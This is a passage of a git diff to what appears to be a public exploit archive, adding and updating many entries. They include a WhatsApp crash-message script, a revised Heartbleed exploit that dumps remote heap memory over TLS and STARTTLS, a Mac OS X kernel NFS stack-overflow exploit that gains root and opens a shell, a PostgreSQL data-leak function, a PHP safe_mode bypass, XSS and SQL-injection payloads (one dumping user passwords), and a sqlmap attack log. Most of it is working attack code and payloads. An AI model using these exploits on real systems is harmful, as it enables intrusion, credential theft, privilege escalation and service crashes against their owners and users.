= getCredentials(MINE_CONFIG or DEFAULT_CONFIG ) + + if credentials: + + countryCode, login, identity, password = credentials + identity = Utilities.processIdentity(identity) + + password = base64.b64decode(password) + + # Custom message that will crash WhatsApp + message = message = "\xf4\xaa\xde\x04\xbf" + + #print countryCode, login, identity, password + wa = WhatsappEchoClient(phone, message) + wa.login(login, password) + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument("number", help="Phone number to send the crash message") + parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true") + args = parser.parse_args() + + Debugger.enabled = args.verbose + main(args.number) diff --git a/platforms/multiple/local/32847.txt b/platforms/multiple/local/32847.txt new file mode 100755 index 000000000..a1c22eee5 --- /dev/null +++ b/platforms/multiple/local/32847.txt @@ -0,0 +1,21 @@ +source: http://www.securityfocus.com/bid/34069/info + +PostgreSQL is prone to an information-disclosure vulnerability. + +Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. + +PostgreSQL 8.3.6 is vulnerable; other versions may also be affected. + +CREATE OR REPLACE FUNCTION do_tell(anyelement) +RETURNS bool +COST 0.1 +VOLATILE +LANGUAGE plpgsql +AS $body$ +BEGIN +raise notice 'hah: %s', $1::text; +return true; +END; +$body$; + +SELECT * FROM restricted_view WHERE do_tell(secret_column); \ No newline at end of file diff --git a/platforms/multiple/remote/32791.c b/platforms/multiple/remote/32791.c index 0c8f32c4c..6c726cb82 100755 --- a/platforms/multiple/remote/32791.c +++ b/platforms/multiple/remote/32791.c @@ -3,43 +3,69 @@ * ========================================================= * This exploit uses OpenSSL to create an encrypted connection * and trigger the heartbleed leak. The leaked information is -* returned encrypted and is then decrypted, decompressed and -* wrote to a file to annoy IDS/forensics. The exploit can set -* the heatbeart payload length arbitrarily or use two preset -* values for 0x00 and MAX length. The vulnerability occurs due +* returned within encrypted SSL packets and is then decrypted +* and wrote to a file to annoy IDS/forensics. The exploit can +* set heartbeat payload length arbitrarily or use two preset +* values for NULL and MAX length. The vulnerability occurs due * to bounds checking not being performed on a heap value which * is user supplied and returned to the user as part of DTLS/TLS * heartbeat SSL extension. All versions of OpenSSL 1.0.1 to * 1.0.1f are known affected. You must run this against a target * which is linked to a vulnerable OpenSSL library using DTLS/TLS. +* This exploit leaks upto 65532 bytes of remote heap each request +* and can be run in a loop until the connected peer ends connection. +* The data leaked contains 16 bytes of random padding at the end. +* The exploit can be used against a connecting client or server, +* it can also send pre_cmd's to plain-text services to establish +* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients +* will often forcefully close the connection during large leak +* requests so try to lower your payload request size. * * Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g * * E.g. * $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed -* $ ./heartbleed -s 192.168.11.9 -p 443 -f leakme -t 65535 +* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1 * [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit * [ ============================================================= -* [ connecting to 192.168.11.9 443/tcp -* [ connected to 192.168.11.9 443/tcp -* [ setting heartbeat payload_length to 65535 -* [ heartbeat returned type=24 length=16416 -* [ decrypting and decompressing SSL packet +* [ connecting to 192.168.11.23 443/tcp +* [ connected to 192.168.11.23 443/tcp +* [ <3 <3 <3 heart bleed <3 <3 <3 +* [ heartbeat returned type=24 length=16408 +* [ decrypting SSL packet +* [ heartbleed leaked length=65535 * [ final record type=24, length=16384 -* [ wrote 16384 bytes to file 'leakme' +* [ wrote 16381 bytes of heap to file 'out' +* [ heartbeat returned type=24 length=16408 +* [ decrypting SSL packet +* [ final record type=24, length=16384 +* [ wrote 16384 bytes of heap to file 'out' +* [ heartbeat returned type=24 length=16408 +* [ decrypting SSL packet +* [ final record type=24, length=16384 +* [ wrote 16384 bytes of heap to file 'out' +* [ heartbeat returned type=24 length=16408 +* [ decrypting SSL packet +* [ final record type=24, length=16384 +* [ wrote 16384 bytes of heap to file 'out' +* [ heartbeat returned type=24 length=42 +* [ decrypting SSL packet +* [ final record type=24, length=18 +* [ wrote 18 bytes of heap to file 'out' * [ done. -* $ hexdump -C leakme +* $ ls -al out +* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out +* $ hexdump -C out * - snip - snip * -* Added support for pre_cmd's and as an example use STARTTLS -* to leak from vulnerable SMTP services. -* -* Added experimental support for exploiting connecting clients -* with rogue server. Generate certificates with the following: +* Use following example command to generate certificates for clients. * * $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \ * -keyout server.key -out server.crt * +* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \ +* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" +* * todo: add udp/dtls support. * * - Hacker Fantastic @@ -72,6 +98,11 @@ #define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \ c[1]=(unsigned char)(((s) )&0xff)),c+=2) +int first = 0; +int leakbytes = 0; +int repeat = 1; +int badpackets = 0; + typedef struct { int socket; SSL *sslHandle; @@ -89,13 +120,11 @@ typedef struct { void ssl_init(); void usage(); -void* heartbleed(connection*,unsigned int); -void* sneakyleaky(connection*,char*,int); int tcp_connect(char*,int); int tcp_bind(char*, int); connection* tls_connect(int); connection* tls_bind(int); -int pre_cmd(int,int); +int pre_cmd(int,int,int); void* heartbleed(connection* ,unsigned int); void* sneakyleaky(connection* ,char*, int); @@ -161,10 +190,15 @@ void ssl_init(){ connection* tls_connect(int sd){ connection *c; c = malloc(sizeof(connection)); - c->socket = sd; + if(c==NULL){ + printf("[ error in malloc()\n"); + exit(0); + } + c->socket = sd; c->sslHandle = NULL; c->sslContext = NULL; - c->sslContext = SSL_CTX_new(TLSv1_client_method()); + c->sslContext = SSL_CTX_new(SSLv23_client_method()); + SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); if(c->sslContext==NULL) ERR_print_errors_fp(stderr); c->sslHandle = SSL_new(c->sslContext); @@ -186,12 +220,20 @@ connection* tls_bind(int sd){ connection *c; char* buf; buf = malloc(4096); + if(buf==NULL){ + printf("[ error in malloc()\n"); + exit(0); + } memset(buf,0,4096); c = malloc(sizeof(connection)); - c->socket = sd; + if(c==NULL){ + printf("[ error in malloc()\n"); + exit(0); + } + c->socket = sd; c->sslHandle = NULL; c->sslContext = NULL; - c->sslContext = SSL_CTX_new(TLSv1_server_method()); + c->sslContext = SSL_CTX_new(SSLv23_server_method()); if(c->sslContext==NULL) ERR_print_errors_fp(stderr); SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); @@ -218,28 +260,51 @@ connection* tls_bind(int sd){ return c; } -int pre_cmd(int sd,int verbose){ +int pre_cmd(int sd,int precmd,int verbose){ /* this function can be used to send commands to a plain-text service or client before heartbleed exploit attempt. e.g. STARTTLS */ - int rc; + int rc, go = 0; char* buffer; - char* hello = "EHLO test\n"; - char* start = "STARTTLS\n"; - buffer = malloc(2049); - memset(buffer,0,2049); - rc = read(sd,buffer,2048); - printf("[ banner: %s",buffer); - send(sd,hello,strlen(hello),0); - memset(buffer,0,2049); - rc = read(sd,buffer,2048); - if(verbose==1){ - printf("%s\n",buffer); - } - send(sd,start,strlen(start),0); - memset(buffer,0,2049); - rc = read(sd,buffer,2048); - if(verbose==1){ - printf("%s\n",buffer); + char* line1; + char* line2; + switch(precmd){ + case 0: + line1 = "EHLO test\n"; + line2 = "STARTTLS\n"; + break; + case 1: + line1 = "CAPA\n"; + line2 = "STLS\n"; + break; + case 2: + line1 = "a001 CAPB\n"; + line2 = "a002 STARTTLS\n"; + break; + default: + go = 1; + break; + } + if(go==0){ + buffer = malloc(2049); + if(buffer==NULL){ + printf("[ error in malloc()\n"); + exit(0); + } + memset(buffer,0,2049); + rc = read(sd,buffer,2048); + printf("[ banner: %s",buffer); + send(sd,line1,strlen(line1),0); + memset(buffer,0,2049); + rc = read(sd,buffer,2048); + if(verbose==1){ + printf("%s\n",buffer); + } + send(sd,line2,strlen(line2),0); + memset(buffer,0,2049); + rc = read(sd,buffer,2048); + if(verbose==1){ + printf("%s\n",buffer); + } } return sd; } @@ -248,7 +313,11 @@ void* heartbleed(connection *c,unsigned int type){ unsigned char *buf, *p; int ret; buf = OPENSSL_malloc(1 + 2); - p = buf; + if(buf==NULL){ + printf("[ error in malloc()\n"); + exit(0); + } + p = buf; *p++ = TLS1_HB_REQUEST; switch(type){ case 0: @@ -262,7 +331,7 @@ void* heartbleed(connection *c,unsigned int type){ s2n(type,p); break; } - printf("[ <3 <3 <3 heart bleed <3 <3 <3 <3\n"); + printf("[ <3 <3 <3 heart bleed <3 <3 <3\n"); ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3); OPENSSL_free(buf); return c; @@ -300,10 +369,19 @@ void* sneakyleaky(connection *c,char* filename, int verbose){ n2s(p,rr->length); if(rr->type==24){ printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length); + if(rr->length > 16834){ + printf("[ error: got a malformed TLS length.\n"); + exit(0); + } } else{ printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length); s->packet_length=0; + badpackets++; + if(badpackets > 3){ + printf("[ error: too many bad packets recieved\n"); + exit(0); + } goto apple; } } @@ -312,7 +390,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){ n=ssl3_read_n(s,i,i,1); if (n <= 0) goto apple; } - printf("[ decrypting and decompressing SSL packet\n"); + printf("[ decrypting SSL packet\n"); s->rstate=SSL_ST_READ_HEADER; rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]); rr->data=rr->input; @@ -371,19 +449,56 @@ void* sneakyleaky(connection *c,char* filename, int verbose){ } rr->off=0; s->packet_length=0; - if(verbose==1){ - { unsigned int z; for (z=0; zlength; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); } + if(first==0){ + uint heartbleed_len = 0; + char* fp = s->s3->rrec.data; + (long)fp++; + memcpy(&heartbleed_len,fp,2); + heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8; + first = 2; + leakbytes = heartbleed_len + 16; + printf("[ heartbleed leaked length=%u\n",heartbleed_len); + } + if(verbose==1){ + { unsigned int z; for (z=0; zlength; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); } printf("\n"); } + leakbytes-=rr->length; + if(leakbytes > 0){ + repeat = 1; + } + else{ + repeat = 0; + } printf("[ final record type=%d, length=%u\n", rr->type, rr->length); - int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); - write(fd,s->s3->rrec.data,s->s3->rrec.length); - close(fd); - printf("[ wrote %d bytes to file '%s'\n",rr->length, filename); - printf("[ done.\n"); - exit(0); + int output = s->s3->rrec.length-3; + if(output > 0){ + int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); + if(first==2){ + first--; + write(fd,s->s3->rrec.data+3,s->s3->rrec.length); + /* first three bytes are resp+len */ + printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename); + } + else{ + /* heap data & 16 bytes padding */ + write(fd,s->s3->rrec.data+3,s->s3->rrec.length); + printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename); + } + close(fd); + } + else{ + printf("[ nothing from the heap to write\n"); + } + return; apple: printf("[ problem handling SSL record packet - wrong type?\n"); + badpackets++; + if(badpackets > 3){ + printf("[ error: too many bad packets recieved\n"); + exit(0); + } + return; } void usage(){ @@ -392,8 +507,12 @@ void usage(){ printf("[ --port|-p - the port to target\n"); printf("[ --file|-f - file to write data to\n"); printf("[ --bind|-b - bind to ip for exploiting clients\n"); - printf("[ --precmd|-c - send precmd buffer (STARTTLS)\n"); - printf("[ --type|-t - select exploit to try\n"); + printf("[ --precmd|-c - send precmd buffer (STARTTLS)\n"); + printf("[ 0 = SMTP\n"); + printf("[ 1 = POP3\n"); + printf("[ 2 = IMAP\n"); + printf("[ --loop|-l - loop the exploit attempts\n"); + printf("[ --type|-t - select exploit to try\n"); printf("[ 0 = null length\n"); printf("[ 1 = max leak\n"); printf("[ n = heartbeat payload_length\n"); @@ -406,11 +525,12 @@ void usage(){ int main(int argc, char* argv[]){ int ret, port, userc, index; - int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 0; + int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9; + int loop = 0; struct hostent *h; connection* c; char *host, *file; - int ihost = 0, iport = 0, ifile = 0, itype = 0; + int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0; printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n"); printf("[ =============================================================\n"); static struct option options[] = { @@ -420,11 +540,12 @@ int main(int argc, char* argv[]){ {"type", 1, 0, 't'}, {"bind", 1, 0, 'b'}, {"verbose", 0, 0, 'v'}, - {"precmd", 0, 0, 'c'}, + {"precmd", 1, 0, 'c'}, + {"loop", 0, 0, 'l'}, {"help", 0, 0,'h'} }; while(userc != -1) { - userc = getopt_long(argc,argv,"s:p:f:t:b:cvh",options,&index); + userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index); switch(userc) { case -1: break; @@ -437,6 +558,10 @@ int main(int argc, char* argv[]){ exit(1); } host = malloc(strlen(optarg) + 1); + if(host==NULL){ + printf("[ error in malloc()\n"); + exit(0); + } sprintf(host,"%s",optarg); } break; @@ -449,6 +574,10 @@ int main(int argc, char* argv[]){ case 'f': if(ifile==0){ file = malloc(strlen(optarg) + 1); + if(file==NULL){ + printf("[ error in malloc()\n"); + exit(0); + } sprintf(file,"%s",optarg); ifile = 1; } @@ -466,16 +595,26 @@ int main(int argc, char* argv[]){ if(ihost==0){ ihost = 1; host = malloc(strlen(optarg)+1); + if(host==NULL){ + printf("[ error in malloc()\n"); + exit(0); + } sprintf(host,"%s",optarg); bind = 1; } break; case 'c': - precmd = 1; + if(iprecmd == 0){ + iprecmd = 1; + precmd = atoi(optarg); + } break; case 'v': verbose = 1; break; + case 'l': + loop = 1; + break; default: break; } @@ -487,12 +626,22 @@ int main(int argc, char* argv[]){ ssl_init(); if(bind==0){ ret = tcp_connect(host, port); - if(precmd==1){ - pre_cmd(ret, verbose); - } + pre_cmd(ret, precmd, verbose); c = tls_connect(ret); heartbleed(c,type); - sneakyleaky(c,file,verbose); + while(repeat==1){ + sneakyleaky(c,file,verbose); + } + while(loop==1){ + printf("[ entered heartbleed loop\n"); + first=0; + repeat=1; + heartbleed(c,type); + while(repeat==1){ + sneakyleaky(c,file,verbose); + } + } + printf("[ done.\n"); exit(0); } else{ @@ -509,13 +658,23 @@ int main(int argc, char* argv[]){ } else{ c = tls_bind(sd); - if(precmd==1){ - pre_cmd(ret, verbose); - } + pre_cmd(ret, precmd, verbose); heartbleed(c,type); - sneakyleaky(c,file,verbose); + while(repeat==1){ + sneakyleaky(c,file,verbose); + } + while(loop==1){ + printf("[ entered heartbleed loop\n"); + first=0; + repeat=0; + heartbleed(c,type); + while(repeat==1){ + sneakyleaky(c,file,verbose); + } + } + printf("[ done.\n"); exit(0); } } } -} +} \ No newline at end of file diff --git a/platforms/multiple/remote/32839.txt b/platforms/multiple/remote/32839.txt new file mode 100755 index 000000000..78f9ea4ae --- /dev/null +++ b/platforms/multiple/remote/32839.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/34001/info + +IBM WebSphere Application Server (WAS) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +This issue affects versions prior to WAS 6.1.0.23 and 7.0.0.3. + +http://www.example.com/ibm/console/ +http://www.example.com/ibm/console/.jsp diff --git a/platforms/multiple/remote/32877.txt b/platforms/multiple/remote/32877.txt new file mode 100755 index 000000000..8ad8ad069 --- /dev/null +++ b/platforms/multiple/remote/32877.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/34288/info + +Xlight FTP Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Versions prior to Xlight FTP Server 3.2.1 are affected. + +The following example input is available: + +User: ' OR '1'='1' ;# \ No newline at end of file diff --git a/platforms/multiple/webapps/32894.txt b/platforms/multiple/webapps/32894.txt new file mode 100755 index 000000000..a62d17677 --- /dev/null +++ b/platforms/multiple/webapps/32894.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/34447/info + +IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities: + +- An HTML-injection vulnerability +- A cross-site scripting vulnerability +- An information-disclosure vulnerability +- Multiple cross-site request-forgery vulnerabilities + +An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible. + +Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable. + +For the HTML-injection issue: +username: \ No newline at end of file diff --git a/platforms/multiple/webapps/32896.html b/platforms/multiple/webapps/32896.html new file mode 100755 index 000000000..74059f854 --- /dev/null +++ b/platforms/multiple/webapps/32896.html @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/34447/info + +IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities: + +- An HTML-injection vulnerability +- A cross-site scripting vulnerability +- An information-disclosure vulnerability +- Multiple cross-site request-forgery vulnerabilities + +An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible. + +Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable. + +
\ No newline at end of file diff --git a/platforms/multiple/webapps/32908.txt b/platforms/multiple/webapps/32908.txt new file mode 100755 index 000000000..956a57f65 --- /dev/null +++ b/platforms/multiple/webapps/32908.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34513/info + +IBM Tivoli Continuous Data Protection for Files is prone to a cross-site scripting vulnerability. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. + +IBM Tivoli Continuous Data Protection for Files 3.1.4.0 is vulnerable; other versions may also be affected. + +http://www.example.com/login/FilepathLogin.html?reason= \ No newline at end of file diff --git a/platforms/novell/remote/32876.txt b/platforms/novell/remote/32876.txt new file mode 100755 index 000000000..1dff1b862 --- /dev/null +++ b/platforms/novell/remote/32876.txt @@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/34267/info + +Novell NetStorage is prone to the following remote vulnerabilities: + +- An information-disclosure vulnerability +- A cross-site scripting vulnerability +- A denial-of-service vulnerability + +Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible. + +The following are vulnerable: + +NetStorage 3.1.5-19 on Open Enterprise Server (OES) +NetStorage 2.0.1 on NetWare 6.5 SP6 + +The following examples are available: + +Cross-site scripting: + +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--> +">'> + +Denial of service: + +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->< +/SCRIPT>">'> + +Information disclosure: + +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->< +/SCRIPT>">'> \ No newline at end of file diff --git a/platforms/osx/dos/32817.txt b/platforms/osx/dos/32817.txt new file mode 100755 index 000000000..d4ccd553f --- /dev/null +++ b/platforms/osx/dos/32817.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/33909/info + +Apple Safari is prone to a denial-of-service vulnerability that stems from a NULL-pointer dereference. + +Attackers can exploit this issue to crash the affected application, denying service to legitimate users. + +Apple Safari 4 Beta is vulnerable; other versions may also be affected. + +The following example URIs are available: + +feeds:%&www.example.com/feed/ +feeds:{&www.example.com/feed/ +feeds:}&www.example.com/feed/ +feeds:^&www.example.com/feed/ +feeds:`&www.example.com/feed/ +feeds:|&www.example.com/feed/ \ No newline at end of file diff --git a/platforms/osx/local/32813.c b/platforms/osx/local/32813.c new file mode 100755 index 000000000..4c3c95ef9 --- /dev/null +++ b/platforms/osx/local/32813.c @@ -0,0 +1,163 @@ +/* + * Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit + * CVE None + * by Kenzley Alphonse + * + * + * Notes: + * This exploit leverage a stack overflow vulnerability to escalate privileges. + * The vulnerable function nfs_convert_old_nfs_args does not verify the size + * of a user-provided argument before copying it to the stack. As a result by + * passing a large size, a local user can overwrite the stack with arbitrary + * content. + * + * Tested on Max OS X Lion xnu-1699.22.73 (x86_64) + * Tested on Max OS X Lion xnu-1699.32.7 (x86_64) + * + * Greets to taviso, spender, joberheide + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/** change these to fit your environment if needed **/ +#define SSIZE (536) + +/** struct user_nfs_args was copied directly from "/bsd/nfs/nfs.h" of the xnu kernel **/ +struct user_nfs_args { + int version; /* args structure version number */ + char* addr __attribute__((aligned(8))); /* file server address */ + int addrlen; /* length of address */ + int sotype; /* Socket type */ + int proto; /* and Protocol */ + char * fh __attribute__((aligned(8))); /* File handle to be mounted */ + int fhsize; /* Size, in bytes, of fh */ + int flags; /* flags */ + int wsize; /* write size in bytes */ + int rsize; /* read size in bytes */ + int readdirsize; /* readdir size in bytes */ + int timeo; /* initial timeout in .1 secs */ + int retrans; /* times to retry send */ + int maxgrouplist; /* Max. size of group list */ + int readahead; /* # of blocks to readahead */ + int leaseterm; /* obsolete: Term (sec) of lease */ + int deadthresh; /* obsolete: Retrans threshold */ + char* hostname __attribute__((aligned(8))); /* server's name */ + /* NFS_ARGSVERSION 3 ends here */ + int acregmin; /* reg file min attr cache timeout */ + int acregmax; /* reg file max attr cache timeout */ + int acdirmin; /* dir min attr cache timeout */ + int acdirmax; /* dir max attr cache timeout */ + /* NFS_ARGSVERSION 4 ends here */ + uint auth; /* security mechanism flavor */ + /* NFS_ARGSVERSION 5 ends here */ + uint deadtimeout; /* secs until unresponsive mount considered dead */ +}; + +/** sets the uid for the current process and safely exits from the kernel**/ +static void r00t_me() { + asm( + // padding + "nop; nop; nop; nop;" + + // task_t %rax = current_task() + "movq %%gs:0x00000008, %%rax;" + "movq 0x00000348(%%rax), %%rax;" + + // proc %rax = get_bsdtask_info() + "movq 0x000002d8(%%rax),%%rax;" + + // ucred location at proc + "movq 0x000000d0(%%rax),%%rax;" + + // uid = 0 + "xorl %%edi, %%edi;" + "movl %%edi, 0x0000001c(%%rax);" + "movl %%edi, 0x00000020(%%rax);" + + // fix the stack pointer and return (EACCES) + "movq $13, %%rax;" + "addq $0x00000308,%%rsp;" + "popq %%rbx;" + "popq %%r12;" + "popq %%r13;" + "popq %%r14;" + "popq %%r15;" + "popq %%rbp;" + "ret;" + :::"%rax" + ); +} + +int main(int argc, char ** argv) { + struct user_nfs_args xdrbuf; + char * path; + char obuf[SSIZE]; + + + /** clear the arguments **/ + memset(&xdrbuf, 0x00, sizeof(struct user_nfs_args)); + memset(obuf, 0x00, SSIZE); + + /** set up variable to get path to vulnerable code **/ + xdrbuf.version = 3; + xdrbuf.hostname = "localhost"; + xdrbuf.addrlen = SSIZE; + xdrbuf.addr = obuf; + + /** set ret address **/ + *(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5); + printf("[*] set ret = 0x%.16lx\n", *(unsigned long *)&obuf[528]); + + /** create a unique tmp name **/ + if ((path = tmpnam(NULL)) == NULL) { + // path can be any directory which we have read/write/exec access + // but I'd much rather create one instead of searching for one + perror("[-] tmpnam"); + exit(EXIT_FAILURE); + } + + /** make the path in tmp so that we can use it **/ + if (mkdir(path, 0660) < 0) { + perror("[-] mkdir"); + exit(EXIT_FAILURE); + } + + /** inform the user that the path was created **/ + printf("[*] created sploit path%s\n", path); + + /** call the vulnerable function **/ + if (mount("nfs", path, 0, &xdrbuf) < 0) { + if (errno == EACCES) { + puts("[+] escalating privileges..."); + } else { + perror("[-] mount"); + } + + } + + /** clean up tmp dir **/ + if (rmdir(path) < 0) { + perror("[-] rmdir"); + } + + /** check if privs are equal to root **/ + if (getuid() != 0) { + puts("[-] priviledge escalation failed"); + exit(EXIT_FAILURE); + } + + /** get root shell **/ + printf("[+] We are now uid=%i ... your welcome!\n", getuid()); + printf("[+] Dropping a shell.\n"); + execl("/bin/sh", "/bin/sh", NULL); + return 0; +} \ No newline at end of file diff --git a/platforms/php/local/32901.php b/platforms/php/local/32901.php new file mode 100755 index 000000000..40f0355ce --- /dev/null +++ b/platforms/php/local/32901.php @@ -0,0 +1,66 @@ +source: http://www.securityfocus.com/bid/34475/info + +PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access files in unauthorized locations. + +This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, with the 'safe_mode' and 'open_basedir' restrictions assumed to isolate the users from each other. + +PHP 5.2.9 is vulnerable; other versions may also be affected. + + diff --git a/platforms/php/webapps/32807.txt b/platforms/php/webapps/32807.txt new file mode 100755 index 000000000..5e8ee3bfc --- /dev/null +++ b/platforms/php/webapps/32807.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/33859/info + +The gigCalendar component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +gigCalendar 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1' +UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23 \ No newline at end of file diff --git a/platforms/php/webapps/32808.txt b/platforms/php/webapps/32808.txt new file mode 100755 index 000000000..1ae888a40 --- /dev/null +++ b/platforms/php/webapps/32808.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/33872/info + +Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials. + +Magento 1.2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php/admin/ +Username: "> \ No newline at end of file diff --git a/platforms/php/webapps/32809.txt b/platforms/php/webapps/32809.txt new file mode 100755 index 000000000..516819db6 --- /dev/null +++ b/platforms/php/webapps/32809.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/33872/info + +Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials. + +Magento 1.2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php/admin/index/forgotpassword/ +Email address: "> \ No newline at end of file diff --git a/platforms/php/webapps/32810.txt b/platforms/php/webapps/32810.txt new file mode 100755 index 000000000..eea5c7a3e --- /dev/null +++ b/platforms/php/webapps/32810.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33872/info + +Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials. + +Magento 1.2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/downloader/?return=%22%3Cscript%3Ealert('xss')%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32814.txt b/platforms/php/webapps/32814.txt new file mode 100755 index 000000000..6d40c2e08 --- /dev/null +++ b/platforms/php/webapps/32814.txt @@ -0,0 +1,73 @@ +# Exploit Title: Sendy 1.1.9.1 - SQL Injection Vulnerability +# Date: 2014-04-10 +# Exploit Author: marduk369 +# Vendor Homepage: http://sendy.co/ +# Software Link: http://sendy.co/ +# Version: 1.1.9.1 + +root@kali:~# sqlmap -u 'http://server1/send-to?i=1&c=10' --cookie="version=1.1.9.1; PHPSESSID=[phpsessid value]; logged_in=[logged_in value]" -p c -D sendy --tables + + sqlmap/1.0-dev - automatic SQL injection and database takeover tool + http://sqlmap.org + +[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program + +[*] starting at 11:48:57 + +[11:48:57] [INFO] resuming back-end DBMS 'mysql' +[11:48:57] [INFO] testing connection to the target URL +sqlmap identified the following injection points with a total of 0 HTTP(s) requests: +--- +Place: GET +Parameter: c + Type: AND/OR time-based blind + Title: MySQL > 5.0.11 AND time-based blind + Payload: c=10 AND SLEEP(5)&i=1 +--- +[11:48:58] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) +web application technology: PHP 5.3.2, Apache 2.2.14 +back-end DBMS: MySQL 5.0.11 +[11:48:58] [INFO] fetching tables for database: 'sendy' +[11:48:58] [INFO] fetching number of tables for database 'sendy' +[11:48:58] [WARNING] time-based comparison requires larger statistical model, please wait.............................. +do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y +[11:49:50] [WARNING] it is very important not to stress the network adapter during usage of time-based 